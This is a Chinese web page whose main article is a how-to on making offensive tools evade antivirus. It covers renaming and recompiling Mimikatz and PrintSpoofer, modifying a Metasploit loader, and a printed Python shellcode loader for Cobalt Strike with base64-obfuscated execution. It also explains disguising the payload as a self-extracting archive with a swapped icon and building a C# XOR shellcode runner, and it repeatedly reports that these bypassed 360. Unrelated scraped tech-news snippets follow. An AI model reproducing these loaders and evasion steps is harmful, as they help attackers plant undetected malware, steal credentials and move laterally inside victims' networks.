范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文
国学影视

内网渗透常用工具免杀

  内网渗透-常用工具免杀Mimikatz免杀
  Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz的使用说明网上资料很多,这里就不多加介绍了,随着这两年hw行动越来越多,企事业单位也都开始注重内网安全,有预算的会上全套的终端安全、企业版杀软或者EDR,就算没有预算的也会装个360全家桶或者主机卫士之类的,这也导致很多时候你的mimikatz可能都没法拷贝过去或者没有加载执行,拿了台服务器却横向移不动就尴尬了。因为这款工具特别出名所以被查杀的机率很大, 我们可以通过 github 上的开源代码对其进行源码免杀从而 bypass 反病毒软件。
  Mimikatz 源代码下载 https://github.com/gentilkiwi/mimikatz
  免杀步骤
  替换 mimikatz 关键字 shenghuo
  mimikatz 下的文件全部改为 shenghu
  把项目里所有的文件注释去掉
  /_ Benjamin DELPY  gentilkiwi   http://blog.gentilkiwi.com benjamin@gentilkiwi.com Licence : https://creativecommons.org/licenses/by/4.0/ _/
  打开红色框框内的内容,替换图标文件
  出现 无法找到 v140 的生成工具(平台工具集 ="v140"),要选择自己安装的平台工具集
  重新生成
  生成的程序能够正确运行
  成功过360
  PrintSpoofer做免杀
  printspoofer提权工具目前主流的提权工具之一,360 安全会自动查杀,其他杀毒软件并不会查杀。
  源码下载地址:
  https://github.com/itm4n/PrintSpoofer
  将PrintSpoofer.cpp 里面的输出帮助文档全部清空
  导入图标
  重新生成,程序生成成功
  成功过360
  msf免杀
  metasploit 是一款开源的安全漏洞检测工具,同时Metasploit 是免费的工具,因此安全工作人员常用 Metasploit 工具来检测系统的安全性。Metasploit Framework (MSF) 在 2003 年以开放源码方式发布,是可以自由获取的开发框架。 它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、 shellcode 编写和漏洞研究提供了一个可靠平台。其中攻击载荷模块(Payload) , 在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且 Metasploit 还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混 淆绕过一部分杀毒软件。
  工具 Dev-Cpp 5.11 TDM-GCC 4.9.2 Setup 下载地址 https://sourceforge.net/projects/orwelldevcpp/
  metasploit源码下载:metasploit-loader/master/src/main.c
  选择:文件->新建项目->consoleApplication->c 项目
  把winsock2.h 移动到windows.h 上 不然编译会出错。
  将这四处的数字改为其他数字
  设置攻击载荷,执行后成功上线
  成功过360
  Python3 对Cobalt strike的 shellcode 做免杀
  生成python64位的shellcode
  添加生成的shellcode import ctypesimport base64#shellcode 加载def shellCodeLoad(shellcode):    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))    buf= (ctypes.c_char * len(shellcode)).from_buffer(shellcode)    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTW Vtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))    handle =ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64( ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))if __name__ == "__main__":    shellCodeLoad(bytearray(b"你的shellcode"))//这里为你的添加的shellcode位置
  编译成程序
  pyinstaller -F test.py —noconsole
  此时还要做的就是更改图标,这里介绍一种方法
  首先右击它,选择"添加到压缩文件"
  在弹出来的一个"压缩文件名和参数"框中设置压缩文件格式为"ZIP",压缩方式为"存储",压缩选项为"创建自解压格式压缩文件"。
  随后选择"高级"选项卡。选择了"高级"选项卡以后直接点击"自解压选项"
  在设置选项卡中解压后运行对应程序
  在模式选项卡中选择解压临时文件夹和全部隐藏
  随后再选择"更新"选项卡,在覆盖方式中选择"覆盖所有文件"
  最后选择"文本和图标"选项卡,在自定义自解压文件徽标和图标中选择"从文件加载自解压文件图标",点击"浏览",找到自己想要加载的图标文件后并打开
  然后就点击确定(两次)就可以生成一个新的exe程序了。图标已经改变了,再运行测试一下
  上传去目标主机,这里更改了程序名称
  在线查杀
  c# xor 加载器免杀cobaltstrike的shellcode
  是很流行的编程语言,也可以用它来做一个加载器运行cobaltstrike的 shellcode,生成出来的 文件特别的小,可以很好地投递传输。
  项目地址 https://github.com/antman1p/ShellCodeRunner 用 vs2017 打开 sln 项目文件
  选择 xorkryptor 生成编码器 用 cobalt strike生成 raw 二进制文件
  encrypt.bin 就是经过编码后的文件
  项目里面存有 Rsources 和 encrypt.bin 文件 事实上项目是没有这个文件夹和文 件所以在当前目录新建文件夹和将生成好的shellcode文件 encrypt.bin 复制到文 件夹里。右键选择编译文件即可。
  此时文件正常
  重新编译,成功生成后门程序
  成功过360
  成功上线

一个月入6万的家庭是如何走向破产的收录于话题腾讯3个程序员破产房贷最近几天,一篇名为一个月入6万的家庭是如何走向破产的的网文在各路社交朋友圈赢得不少流量。文章讲述了一个腾讯的程序员家庭,月收入高达6万元,如今快要陷iOS15。5更新,重大改变来了经Apple在3月底向果粉们推送iOS15。4。1正式版后,Apple将iOS15。4正式版停止降级验证,意味着iOS15全系无法降级。Apple自发布iOS15已经很长时间,改动北京大学附属中学人工智能学习教室项目1hr学生终端1处理器四核1。2GHz内存2GB(RAM)存储16GB支持microSD存储卡128GB预装操作系统Android5。0以上3)屏幕8英寸,43屏幕,分辨率1024新医疗时代新与旧作者坛子谈医疗我熟悉医药医疗医保商保互联网等领域,有着对当前医疗体制的深刻认知医药医疗医保的系统化理解互联网医疗的前沿行业信息商业模式的深入浅出讲解。一键三连,请关注点赞收藏!前言12GB512GB,开卖半个月仍供不应求,天玑9000新旗舰定价良心饥饿营销指的是有货也不卖,每次放出少量库存让消费者们抢购,用来抬高产品的热度,而提起饥饿营销,很多人第一时间所想到的手机品牌都是小米,尽管小米创始人雷军曾多次表示小米公司绝对没有饥还是认输了,8848高端机退场,6256G宣布降一万对于高端机来说,或许并不是属于大众的消费品,但我们看到,每个手机品牌基本上都会有高端机布局,原因也比较明显,那就是高端机的利润远比中端机或者千元机高。拿iPhone来说大家就知道了新能源让富人更富,穷人更穷不久前我将自己的一辆油车,唯一的一辆车,更换成一辆新能源汽车,想着油价高企,这时候换个新能源就正是时候,没想到啊,换了个鸡肋啊!直拍大腿!新能源汽车初衷很好,减少排放,净化空气,随苹果13京东狂降600元,iPhone13你会购买吗?这手机确实也该降价了,而且这时间节点和去年iPhone12的降价时间也差不多,甚至连降价幅度差别也不大。降价幅度到后面只会越来越大,618价格只会更低,起码还有600元的降价优惠幅苹果刚发布的最便宜5G手机iPhoneSE3万元显示器遭大量差评Tech星球4月11日消息,此前苹果春季发布会发布的万元新款显示器以及新款iPhoneSE,在近日均遭用户吐槽出现问题。据悉,一些用户反馈称,苹果的新款显示器在尝试更新固件时会收到爆NBA球员拿到了苹果14Pro真机据外媒爆料,一个NBA球员手上已经拿到苹果14Pro真机,而且还给出了几张苹果14Pro真机图片,小编也是感叹现在苹果的保密工作做的如此不好嘛,距离苹果14系列的发布还有5个多月,苹果2022年WWDC展望iOS和WatchOS或迎重大升级可能发布新款Mac电脑来源新浪科技北京时间4月11日早间消息,苹果已经宣布,2022年的全球开发者大会(WWDC)将连续第三年在线上举办。预计苹果将在此次大会上对iOS和WatchOS等系统进行重大升级
为什么小米和红米明明是一家人,却要被分割成两个品牌?一般来说,大众消费者口中的小米手机,指的是小米主品牌红米子品牌的手机。从这里我们可以发现,普通用户普遍把小米和红米混为一谈,但小米官方更倾向于进行内部分流,将主品牌和子品牌分割开来广汽埃安古惠南员工将持股,埃安没有科长及以下的干部以前公司的组织体系是按总经理副总经理,下面是部长科长系长。现在没有科长及以下的干部了,都变成项目管理制了,没有行政职务。有经理,但是不会有科长。11月19日,广汽埃安新能源汽车有限天玑1100仅1399,红米Note10Pro再降低价,是否值得入手?红米Note系列是千元机的标杆,每一代的销量都能达到几千万台。但今年可能会差一些,并不是因为红米Note系列不好了,而是今年发布了两代Note系列,自身也形成了一定的分流。今年上半iPhone13黑解机解惑,到底值得买吗?今年iPhone13系列加量不加价,虽然降价了当时仍然是贵啊,基础版的iPhone13起售价要5999元,这钱安卓顶级旗舰不是随便买。所以预算有限的朋友把目光投向了黑解机。那么黑解华为造车在赛力斯丢的脸,能靠与长安合作的阿维塔赚回来吗?知嘹汽车木易旋凌自主品牌发展高端新能源车型,最好的办法就是重新建立一个品牌,然后通过营销和换赛道的市场,来打造出更高端的品牌形象,这也是目前自主品牌惯用的做法。当然,像雷克萨斯,英不想升级到win11?教你安装Windows10LTSC2021版,暂别win11Windows11发布至今,bug出了一堆也修复了一堆,但是好像很多用户升级到win11的意愿还是不大,甚至有的升级了还是想退win10。但是微软的操作是有点狗的,即使你重装回wi论为什么不要买整机整机有三种第一种小作坊整机,这类整机可以说是便宜的离谱,低则几百块钱多则上千,他们都是用的什么配件呢?打开你的淘宝,看见这么便宜的整机wow,就问你心动了没有?然而这电脑年龄可能与写一写和手机有关的回忆从初中到大学我一共买过6部手机。现在正在用第六部手机写文章。第一部手机是一部老人机,因为当时的我还只是初中生而已。所以只能用老人机。老人机是如何来的我已经忘了,现在已经不再使用了。如何才能提高效率?提高效率,通常指的是学习效率,工作效率和生活效率吧。如何提高学习效率?一,学科管理假如你是个学生,就得分清主课,副课之别,投入的时间和精力也应该有所轻重不同,取得的成绩,显然也会不曝京东方今年向苹果提供超千万屏幕,iPhone12让路新机价格滑铁卢作为国内显示器的领先厂商,京东方近年来也与苹果关系暧昧,而苹果在供应链上一直要求很高,这也彰显了京东方的实力。而今年,有很多消息称京东方的OLED生产质量进一步提升,进入最新的iPiPhone14好消息,接口终于要变了一般来说苹果会在9月份的时候推出新款iPhone手机,比如今年9月推出的iPhone13系列手机,现在距离iPhone13系列手机推出已经有一段时间关于iPhone14系列手机的爆